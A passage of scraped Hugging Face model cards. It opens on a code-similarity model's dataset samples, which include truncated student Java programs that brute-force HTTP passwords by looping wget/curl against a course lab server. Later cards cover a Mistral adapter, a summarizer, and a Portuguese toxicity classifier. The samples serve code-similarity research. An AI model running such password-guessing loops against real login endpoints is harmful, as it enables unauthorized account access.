| <code>0</code> | <code>import java.util.*;<br>import java.io.*;<br>import java.*;<br><br>public class Dogs5<br>{<br> public static void main(String [] args) throws Exception<br> { <br> executes("rm index.*");<br> executes("wget http://www.cs.rmit.edu./students");<br><br> while (true)<br> {<br> String addr= "wget http://www.cs.rmit.edu./students";<br> executes(addr);<br> String hash1 = md5sum("index.html");<br> String hash2 = md5sum("index.html.1");<br> System.out.println(hash1 +"|"+ hash2);<br> <br> BufferedReader buf = new BufferedReader(new FileReader("/home/k//Assign2/ulist1.txt"));<br><br> String line=" " ;<br> String line1=" " ;<br> String line2=" ";<br> String line3=" ";<br> String[] cad = new String[10];<br> <br> executes("./.sh");<br> <br> int i=0;<br> while ((line = buf.readLine()) != null)<br> {<br> <br> line1="http://www.cs.rmit.edu./students/images"+line;<br> if (i==1)<br> line2="http://www.cs.rmi...</code> | <code><br><br>import java.Runtime;<br>import java.io.*;<br><br>public class differenceFile<br>{<br> StringWriter sw =null;<br> PrintWriter pw = null;<br> public differenceFile()<br> {<br> sw = new StringWriter();<br> pw = new PrintWriter();<br> }<br> public String compareFile()<br> {<br> try<br> {<br> Process = Runtime.getRuntime().exec("diff History.txt Comparison.txt");<br><br> InputStream write = sw.getInputStream();<br> BufferedReader bf = new BufferedReader (new InputStreamReader(write));<br> String line;<br> while((line = bf.readLine())!=null)<br> pw.println(line);<br> if((sw.toString().trim()).equals(""))<br> {<br> System.out.println(" difference");<br> return null;<br> }<br> System.out.println(sw.toString().trim());<br> }catch(Exception e){}<br> return sw.toString().trim();<br> }<br>}</code> |
| <code>0</code> | <code><br><br>import java.util.*;<br>import java.text.*;<br>import java.io.*;<br>import java.*;<br>import java.net.*;<br><br>public class WatchDog<br>{<br> public static void main(String args[])<br> {<br> String s = null;<br> String webpage = "http://www.cs.rmit.edu./students/";<br> <br> <br> String file1 = "file1";<br> String file2 = "file2";<br> <br> try<br> {<br> Process p = Runtime.getRuntime().exec("wget -O " + file1 + " " + webpage);<br> <br> BufferedReader stdInput = new BufferedReader(new <br> InputStreamReader(p.getInputStream()));<br><br> BufferedReader stdError = new BufferedReader(new <br> InputStreamReader(p.getErrorStream()));<br><br> <br> while ((s = stdInput.readLine()) != null) { <br> System.out.println(s);<br> }<br> <br> <br> while ((s = stdError.readLine()) != null) { <br> System.out.println(s);<br> }<br> <br> try<br> {<br> p.waitFor(); <br> }<br> catch...</code> | <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br>import java.String;<br>import java.Object;<br>import java.awt.*;<br><br><br><br>public class WatchDog<br>{<br> private URL url;<br> private URLConnection urlcon;<br> private int lastModifiedSince = 0;<br> private int lastModified[] = new int[2];<br><br> private int count = 0;<br><br> public static String oldFile;<br> public static String newFile;<br><br> private String diffFile;<br><br> private BufferedWriter bw;<br> private Process p;<br> private Runtime r;<br> private String fileName;<br><br> <br> <br> private ArrayList old[]= new ArrayList[500];<br> private ArrayList news[] = new ArrayList[500];<br> private String info = "";<br> private int index = 0;<br><br> public WatchDog(String fileName)<br> {<br> this.fileName = fileName;<br> oldFile = fileName + ".old";<br> newFile = fileName + ".new";<br> diffFile = "testFile.txt";<br> }<br> public static void main(String args[])<br> {<br> WatchDog wd = new WatchDog("TestDog");<br><br> wd.detectChange(WatchDog.oldFile);<br> while (true)<br> {<br> try<br> {<br> Thread.slee...</code> |
* Loss: [<code>SoftmaxLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#softmaxloss)
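SoftmaxLoss trains the encoder through a small classification head: with its default settings it concatenates the two sentence embeddings u and v with their elementwise difference |u - v|, feeds the result through a linear layer over the label classes, and applies cross-entropy. A rough PyTorch sketch of that computation (the batch size, labels, and random embeddings below are illustrative only, not real encoder output):

```python
import torch
import torch.nn as nn

dim, num_labels = 768, 2          # embedding size and label count for this model
classifier = nn.Linear(3 * dim, num_labels)

u = torch.randn(4, dim)           # encoder output for text_1 (batch of 4 pairs)
v = torch.randn(4, dim)           # encoder output for text_2
labels = torch.tensor([0, 0, 1, 0])

# default SoftmaxLoss features: (u, v, |u - v|)
features = torch.cat([u, v, (u - v).abs()], dim=-1)
logits = classifier(features)                       # shape: (4, num_labels)
loss = nn.functional.cross_entropy(logits, labels)  # scalar, backpropagated into the encoder
```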
### Evaluation Dataset
#### soco_java
* Dataset: [soco_java](https://huggingface.co/datasets/buelfhood/SOCO_java) at [c8fab14](https://huggingface.co/datasets/buelfhood/SOCO_java/tree/c8fab14a9c72776b7d47763c7ab0bccaed49b7fc)
* Size: 3,342 evaluation samples
* Columns: <code>label</code>, <code>text_1</code>, and <code>text_2</code>
* Approximate statistics based on the first 1000 samples:
| | label | text_1 | text_2 |
|:--------|:-----------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | int | string | string |
| details | <ul><li>0: ~99.40%</li><li>1: ~0.60%</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 443.11 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 467.05 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| label | text_1 | text_2 |
|:---------------|:---------------|:---------------|
| <code>0</code> | <code><br><br>import java.Runtime;<br>import java.io.*;<br><br>public class differenceFile<br>{<br> StringWriter sw =null;<br> PrintWriter pw = null;<br> public differenceFile()<br> {<br> sw = new StringWriter();<br> pw = new PrintWriter();<br> }<br> public String compareFile()<br> {<br> try<br> {<br> Process = Runtime.getRuntime().exec("diff History.txt Comparison.txt");<br><br> InputStream write = sw.getInputStream();<br> BufferedReader bf = new BufferedReader (new InputStreamReader(write));<br> String line;<br> while((line = bf.readLine())!=null)<br> pw.println(line);<br> if((sw.toString().trim()).equals(""))<br> {<br> System.out.println(" difference");<br> return null;<br> }<br> System.out.println(sw.toString().trim());<br> }catch(Exception e){}<br> return sw.toString().trim();<br> }<br>}</code> | <code><br><br><br><br><br><br><br>import java.*;<br>import java.io.*;<br>import java.util.*;<br><br>public class BruteForce<br>{<br><br> public static void main(String[] args) <br> {<br> Runtime rt = Runtime.getRuntime();<br> Process pr= null;<br> char chars[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};<br> String pass;<br> char temp[] = {'a','a'};<br> char temp1[] = {'a','a','a'};<br> char temp2[] = {'a'};<br><br> String f= new String();<br> String resp = new String();<br> int count=0;<br> String success = new String();<br> InputStreamReader instre;<br> BufferedReader bufread;<br><br><br> for(int k=0;k<52;k++)<br> {<br> temp2[0]=chars[k];<br> pass = new String(temp2); <br> count++; <br><br> System.out.println("The password tried ...</code> |
| <code>0</code> | <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br>public class Watchdog<br>{<br> public static void main(String args[])<br> {<br> <br> String mainLink="http://www.cs.rmit.edu./students/";<br> String sender = "@cs.rmit.edu.";<br> String recipient = "<webtech@acuneeds.>";<br> String hostName = "yallara.cs.rmit.edu.";<br> int delay = 86400000;<br><br> try<br> {<br> int imgSrcIndex, imgSrcEnd;<br> String imgLink;<br> Vector imageList = new Vector();<br> HttpURLConnection imgConnection;<br> URL imgURL;<br><br> <br> EmailClient email = new EmailClient(sender, recipient, hostName);<br><br> <br> URL url=new URL(mainLink);<br> HttpURLConnection connection = (HttpURLConnection) url.openConnection();<br><br> BufferedReader webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));<br><br> <br> FileWriter fwrite = new FileWriter("local.txt");<br> BufferedWriter writefile = new BufferedWriter(fwrite);<br><br> String line=webpage.readLine();<br><br> while (line != null)<br> {<br> <br> writefile.write(line,0,line.length());<br> wri...</code> | <code><br><br>import java.net.*;<br>import java.io.*;<br>import java.String;<br>import java.*;<br>import java.util.*;<br><br>public class BruteForce {<br> private static final int passwdLength = 3; <br> private static String commandLine<br> = "curl http://sec-crack.cs.rmit.edu./SEC/2/index.php -I -u :";<br> private String chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";<br> private int charLen = chars.length(); <br> private int n = 0; <br> private int n3 = charLen*charLen*charLen; <br> private String response;<br> private String[] password = new String[charLen*charLen*charLen+charLen*charLen+charLen];<br> private char[][] data = new char[passwdLength][charLen];<br> private char[] pwdChar2 = new char[2];<br> private char[] pwdChar = new char[passwdLength];<br> private String url;<br> private int startTime;<br> private int endTime;<br> private int totalTime;<br> private float averageTime;<br> private boolean finish;<br> private Process curl;<br> private BufferedReader bf, responseLine;<br><br>...</code> |
| <code>0</code> | <code><br>import java.io.*;<br>import java.awt.*;<br>import java.net.*;<br><br>public class BruteForce<br>{<br> public static void main (String[] args)<br> {<br> String pw = new String();<br> pw = getPassword ();<br> System.out.println("Password is: "+pw);<br> }<br> public static String getPassword()<br> {<br> String passWord = new String();<br> passWord = "AAA";<br> char[] guess = passWord.toCharArray();<br> Process pro = null;<br> Runtime runtime = Runtime.getRuntime();<br> BufferedReader in = null;<br> String str=null;<br> boolean found = true;<br><br> System.out.println(" attacking.....");<br> for (int i=65;i<=122 ;i++ )<br> {<br> guess[0]=(char)(i);<br> for (int j=65;j<=122 ;j++ )<br> {<br> guess[1]=(char)(j);<br> for (int k=65 ;k<=122 ;k++ )<br> {<br> guess[2]=(char)(k);<br> passWord = new String(guess);<br> String cmd = "wget --http-user= --http-passwd="+passWord +" http://sec-crack.cs.rmit.edu./SEC/2/index.php ";<br> try<br> {<br> pro = runtime.exec(cmd);<br><br> in = new BufferedReader(new InputStreamReader(pro.getErrorSt...</code> | <code><br><br>import java.io.*;<br>import java.text.*;<br>import java.util.*;<br>import java.net.*;<br><br>public class BruteForce extends Thread<br>{<br> private static final String USERNAME = "";<br> private static final char [] POSSIBLE_CHAR =<br> {'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',<br> 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',<br> 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',<br> 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'};<br> private static int NUMBER_OF_THREAD = 500;<br><br> private static Date startDate = null;<br> private static Date endDate = null;<br><br> private String address;<br> private String password;<br><br> public BruteForce(String address, String password)<br> {<br> this.address = address;<br> this.password = password;<br> }<br><br> public static void main(String[] args) throws IOException<br> {<br> if (args.length < 1)<br> {<br> System.err.println("Invalid usage!");<br> System.err.println("...</code> |
* Loss: [<code>SoftmaxLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#softmaxloss)
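`SoftmaxLoss` classifies a sentence pair from the concatenated features `(u, v, |u - v|)` of the two sentence embeddings, passed through a linear classification head. As a rough illustration of that head (the toy dimensions and random weights below are made up, not this model's trained parameters):

```python
import numpy as np

def softmax_loss_head(u, v, W, b):
    """Score a sentence pair the way SoftmaxLoss does:
    concatenate (u, v, |u - v|) and apply a linear classifier + softmax."""
    features = np.concatenate([u, v, np.abs(u - v)])
    logits = W @ features + b
    exp = np.exp(logits - logits.max())  # numerically stable softmax
    return exp / exp.sum()

rng = np.random.default_rng(0)
dim, num_labels = 8, 2                   # toy sizes, not the real embedding dim
u, v = rng.normal(size=dim), rng.normal(size=dim)
W = rng.normal(size=(num_labels, 3 * dim))
b = np.zeros(num_labels)

probs = softmax_loss_head(u, v, W, b)
print(probs)                             # one probability per label, sums to 1
```

During training, the cross-entropy of these probabilities against the pair's label is minimized, which shapes the embeddings themselves.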
### Training Hyperparameters
#### Non-Default Hyperparameters
- `eval_strategy`: steps
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 16
- `learning_rate`: 2e-05
- `num_train_epochs`: 1
- `warmup_ratio`: 0.1
- `fp16`: True
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: steps
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 16
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 2e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: batch_sampler
- `multi_dataset_batch_sampler`: proportional
</details>
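The `warmup_ratio` of 0.1 with the `linear` scheduler above means the learning rate climbs from 0 to the peak of 2e-05 over the first 10% of optimizer steps, then decays linearly back to 0. A minimal sketch of that schedule (the total step count is illustrative):

```python
def linear_schedule_with_warmup(step, total_steps, base_lr=2e-5, warmup_ratio=0.1):
    """Linear warmup for the first warmup_ratio of training, then linear decay to 0."""
    warmup_steps = int(total_steps * warmup_ratio)
    if step < warmup_steps:
        return base_lr * step / max(1, warmup_steps)
    return base_lr * max(0.0, (total_steps - step) / max(1, total_steps - warmup_steps))

total = 1880  # roughly one epoch of optimizer steps here (illustrative)
lrs = [linear_schedule_with_warmup(s, total) for s in range(total + 1)]
print(max(lrs), lrs[0], lrs[-1])  # peaks at 2e-05, starts and ends at 0
```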
### Training Logs
| Epoch | Step | Training Loss | Validation Loss |
|:------:|:----:|:-------------:|:---------------:|
| 0.0532 | 100 | 0.2015 | 0.0240 |
| 0.1064 | 200 | 0.0143 | 0.0209 |
| 0.1596 | 300 | 0.0241 | 0.0241 |
| 0.2128 | 400 | 0.0174 | 0.0213 |
| 0.2660 | 500 | 0.0228 | 0.0206 |
| 0.3191 | 600 | 0.0061 | 0.0226 |
| 0.3723 | 700 | 0.0194 | 0.0208 |
| 0.4255 | 800 | 0.0193 | 0.0197 |
| 0.4787 | 900 | 0.0261 | 0.0175 |
| 0.5319 | 1000 | 0.0189 | 0.0178 |
| 0.5851 | 1100 | 0.0089 | 0.0188 |
| 0.6383 | 1200 | 0.0174 | 0.0161 |
| 0.6915 | 1300 | 0.0171 | 0.0162 |
| 0.7447 | 1400 | 0.0149 | 0.0155 |
| 0.7979 | 1500 | 0.011 | 0.0164 |
| 0.8511 | 1600 | 0.0308 | 0.0160 |
| 0.9043 | 1700 | 0.0048 | 0.0167 |
| 0.9574 | 1800 | 0.0142 | 0.0164 |
### Framework Versions
- Python: 3.11.13
- Sentence Transformers: 4.1.0
- Transformers: 4.52.4
- PyTorch: 2.6.0+cu124
- Accelerate: 1.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
## Citation
### BibTeX
#### Sentence Transformers and SoftmaxLoss
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
--> |
morturr/Mistral-7B-v0.1-LOO_headlines-COMB_amazon-comb2-seed28-2025-06-09 | morturr | 2025-06-09T12:05:21Z | 0 | 0 | peft | [
"peft",
"safetensors",
"trl",
"sft",
"generated_from_trainer",
"base_model:mistralai/Mistral-7B-v0.1",
"base_model:adapter:mistralai/Mistral-7B-v0.1",
"license:apache-2.0",
"region:us"
] | null | 2025-06-09T12:05:12Z | ---
library_name: peft
license: apache-2.0
base_model: mistralai/Mistral-7B-v0.1
tags:
- trl
- sft
- generated_from_trainer
model-index:
- name: Mistral-7B-v0.1-LOO_headlines-COMB_amazon-comb2-seed28-2025-06-09
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Mistral-7B-v0.1-LOO_headlines-COMB_amazon-comb2-seed28-2025-06-09
This model is a fine-tuned version of [mistralai/Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1) on an unspecified dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0003
- train_batch_size: 8
- eval_batch_size: 8
- seed: 28
- gradient_accumulation_steps: 4
- total_train_batch_size: 32
- optimizer: AdamW (torch implementation) with betas=(0.9, 0.999), epsilon=1e-08, and no additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
### Framework versions
- PEFT 0.13.2
- Transformers 4.46.1
- Pytorch 2.5.1+cu124
- Datasets 3.0.2
- Tokenizers 0.20.1 |
RisingRD/BharatAI-Summarizer-v1 | RisingRD | 2025-06-09T12:00:53Z | 9 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:google/flan-t5-base",
"base_model:finetune:google/flan-t5-base",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2025-06-09T04:21:07Z | ---
library_name: transformers
license: apache-2.0
base_model: google/flan-t5-base
tags:
- generated_from_trainer
model-index:
- name: BharatAI-Summarizer-v1
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# BharatAI-Summarizer-v1
This model is a fine-tuned version of [google/flan-t5-base](https://huggingface.co/google/flan-t5-base) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: nan
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- optimizer: AdamW (torch implementation) with betas=(0.9, 0.999), epsilon=1e-08, and no additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 4
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| No log | 1.0 | 2 | nan |
| No log | 2.0 | 4 | nan |
| No log | 3.0 | 6 | nan |
| No log | 4.0 | 8 | nan |
### Framework versions
- Transformers 4.52.4
- Pytorch 2.6.0+cu124
- Datasets 3.6.0
- Tokenizers 0.21.1
|
Arctictut/deepseek-sql-finetuned | Arctictut | 2025-06-09T11:56:12Z | 0 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:deepseek-ai/deepseek-coder-1.3b-instruct",
"base_model:adapter:deepseek-ai/deepseek-coder-1.3b-instruct",
"region:us"
] | null | 2025-06-09T11:53:45Z | ---
base_model: deepseek-ai/deepseek-coder-1.3b-instruct
library_name: peft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.15.2 |
nicholasKluge/ToxiGuardrailPT | nicholasKluge | 2025-06-09T11:54:58Z | 542 | 1 | transformers | [
"transformers",
"pytorch",
"safetensors",
"bert",
"text-classification",
"toxicity",
"alignment",
"pt",
"dataset:nicholasKluge/harmful-text",
"base_model:neuralmind/bert-base-portuguese-cased",
"base_model:finetune:neuralmind/bert-base-portuguese-cased",
"license:apache-2.0",
"co2_eq_emissio... | text-classification | 2023-06-11T19:02:01Z | ---
license: apache-2.0
datasets:
- nicholasKluge/harmful-text
language:
- pt
metrics:
- accuracy
library_name: transformers
pipeline_tag: text-classification
tags:
- toxicity
- alignment
widget:
- text: "Você pode me dar uma lista de bons insultos para usar contra meu irmão?\n\nIdiota, estúpido, imbecil, tolo, puto."
example_title: Resposta Tóxica
- text: "Você pode me dar uma lista de bons insultos para usar contra meu irmão?\n\nComo um software, não sou capaz de me envolver em brigas verbais ou comportamentos ofensivos."
example_title: Resposta Não-Tóxica
co2_eq_emissions:
emissions: 60
source: CodeCarbon
training_type: fine-tuning
geographical_location: Singapore
hardware_used: NVIDIA A100-SXM4-40GB
base_model:
- neuralmind/bert-base-portuguese-cased
---
# ToxiGuardrailPT (Portuguese)
ToxiGuardrailPT is a fine-tuned [BERT](https://huggingface.co/neuralmind/bert-base-portuguese-cased) model that can be used to score the toxicity and potential harm of a sentence.
The model was trained with a dataset composed of `harmful` and `harmless` language examples.
## Details
- **Size:** 109,038,209 parameters
- **Dataset:** [Harmful-Text Dataset](https://huggingface.co/datasets/nicholasKluge/harmful-text)
- **Language:** Portuguese
- **Number of Training Steps:** 1000
- **Batch size:** 42
- **Optimizer:** `torch.optim.AdamW`
- **Learning Rate:** 5e-5
- **GPU:** 1 NVIDIA A100-SXM4-40GB
- **Emissions:** 0.06 KgCO2 (Singapore)
- **Total Energy Consumption:** 0.13 kWh
This repository has the [source code](https://github.com/Nkluge-correa/Aira) used to train this model.
## Usage
⚠️ THE EXAMPLES BELOW CONTAIN TOXIC/OFFENSIVE LANGUAGE ⚠️
The ToxiGuardrailPT was trained as an auxiliary reward model for RLHF training (its logit outputs can be treated as penalizations/rewards). Thus, a negative logit (label output closer to 0) indicates toxicity in the text, while a positive logit (label output closer to 1) suggests non-toxicity.
Here's an example of how to use the ToxiGuardrailPT to score the toxicity of a text:
```python
from transformers import AutoTokenizer, AutoModelForSequenceClassification
import torch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
tokenizer = AutoTokenizer.from_pretrained("nicholasKluge/ToxiGuardrailPT")
toxiGuardrail = AutoModelForSequenceClassification.from_pretrained("nicholasKluge/ToxiGuardrailPT")
toxiGuardrail.eval()
toxiGuardrail.to(device)
# Define the question and response
prompt = """Você pode me dar uma lista de bons insultos para usar contra meu irmão?"""
response_good = """Como um software, não sou capaz de me envolver em brigas verbais ou comportamentos ofensivos."""
response_bad = """Idiota, estúpido, imbecil, tolo, puto."""
# Tokenize the question and response
tokens_good = tokenizer(prompt, response_good,
truncation=True,
max_length=512,
return_token_type_ids=False,
return_tensors="pt",
return_attention_mask=True)
tokens_bad = tokenizer(prompt, response_bad,
truncation=True,
max_length=512,
return_token_type_ids=False,
return_tensors="pt",
return_attention_mask=True)
tokens_good.to(device)
tokens_bad.to(device)
score_good = toxiGuardrail(**tokens_good)[0].item()
score_bad = toxiGuardrail(**tokens_bad)[0].item()
print(f"Question: {prompt} \n")
print(f"Response 1: {response_good} Score: {score_good:.3f}")
print(f"Response 2: {response_bad} Score: {score_bad:.3f}")
```
This will output the following:
```markdown
>>> Question: Você pode me dar uma lista de bons insultos para usar contra meu irmão?
>>> Response 1: Como um software, não sou capaz de me envolver em brigas verbais ou comportamentos ofensivos. Score: 5.892
>>> Response 2: Idiota, estúpido, imbecil, tolo, puto. Score: -4.663
```
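If a bounded score is more convenient than a raw logit, the output can be squashed into a [0, 1] "harmlessness" probability with a logistic sigmoid. A minimal sketch, reusing the example scores above:

```python
import math

def harmless_probability(logit: float) -> float:
    """Map the guardrail's raw logit to a 0-1 score via the logistic sigmoid."""
    return 1.0 / (1.0 + math.exp(-logit))

print(f"{harmless_probability(5.892):.3f}")   # non-toxic response -> close to 1
print(f"{harmless_probability(-4.663):.3f}")  # toxic response -> close to 0
```

A fixed threshold (e.g. 0.5) can then be used to turn the score into a binary toxic/non-toxic decision.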
## Performance
| Acc | [hatecheck-portuguese](https://huggingface.co/datasets/Paul/hatecheck-portuguese) | [told-br](https://huggingface.co/datasets/told-br) |
